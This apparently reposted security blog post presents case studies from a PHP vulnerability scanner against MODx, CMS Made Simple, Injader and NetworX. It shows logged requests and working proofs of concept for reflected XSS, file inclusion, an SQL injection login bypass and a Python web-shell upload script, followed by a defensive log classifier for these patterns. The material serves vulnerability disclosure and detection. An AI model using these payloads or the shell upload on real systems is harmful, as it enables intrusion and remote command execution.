
PHP Vulnerability Hunter

by 날으는물고기 2011. 11. 21.


All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown, followed by the exploit proofs of concept and the resulting advisories.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Original Advisory 


Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

# Python 2 (httplib/urllib) proof of concept: the traversal string is sent
# in the default_cms_lang form field, mirroring the log entry above
import httplib, urllib

host = 'localhost'
path = '/cmsms'

# 32 levels of '../' terminated with a null byte, as in the logged request
lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
Original Advisory 


Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Injection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
Original Advisory 


Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

# Python 2 socket-level proof of concept: a hand-built multipart POST,
# then a GET to check whether the uploaded file is reachable
import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    # Content-Length (193) matches the multipart body below exactly
    s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    # Only the status line is checked; the server's HTML body is ignored
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/tmp/shell.php'

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
    else: print 'shell located at http://' + host + shell_path

upload_shell()
Original Advisory

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory
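The four case studies above share three request-level signatures: a script tag or attribute break-out in a parameter, repeated ../ traversal ending in a null byte, and a quote followed by a comment or boolean. As an added example (not part of the original page or of the PHP Vulnerability Hunter tool), the Python 3 classifier below applies those three alert classes to request lines and form fields so the findings can be recognised in access logs or a WAF; the sample request lines are constructed here and shortened from the logged ones, and the patterns are heuristics of my own, not the tool's rules.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Heuristics for the three alert classes seen in the case studies (constructed, not the tool's rules).
PATTERNS = {
    "Reflected XSS": re.compile(r'<\s*script\b|"\s*>', re.I),              # <script>, or "> breaking out of an attribute
    "Local File Inclusion": re.compile(r"(?:\.\./){2,}|\x00"),               # repeated ../ traversal or a null byte
    "Potential SQL Injection": re.compile(r"'\s*(?:;|--|or\b|and\b)", re.I),  # quote followed by a comment or boolean
}

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded payload (%253C) is still seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_params(params):
    """Return {parameter: [alert names]} for every parameter whose decoded value matches a pattern."""
    hits = {}
    for name, value in params.items():
        decoded = fully_decode(value)
        alerts = [alert for alert, rx in PATTERNS.items() if rx.search(decoded)]
        if alerts:
            hits[name] = alerts
    return hits

def classify_request_line(line):
    """Classify the query string of an HTTP request line such as 'GET /x.php?a=b HTTP/1.1'."""
    target = line.split()[1]
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    return classify_params(params)

# Constructed sample request lines, shortened from the case-study log entries above.
SAMPLE_REQUESTS = [
    "GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&q=1 HTTP/1.1",
    "POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1",
    "POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1",
    "GET /networx/group_connections_list_popup.php?group_id=181 HTTP/1.1",   # benign request
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line.split()[1], "->", classify_request_line(line) or "clean")
    # Multipart form fields (the CMS Made Simple case) are checked the same way once parsed out of the body.
    print(classify_params({"default_cms_lang": "../" * 32 + "windows/win.ini\x00"}))
```

The patterns are deliberately narrow and will miss obfuscated variants; they are a starting point for triage, not a substitute for fixing the include, query and upload handling in the applications themselves.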


Source: autosectools.com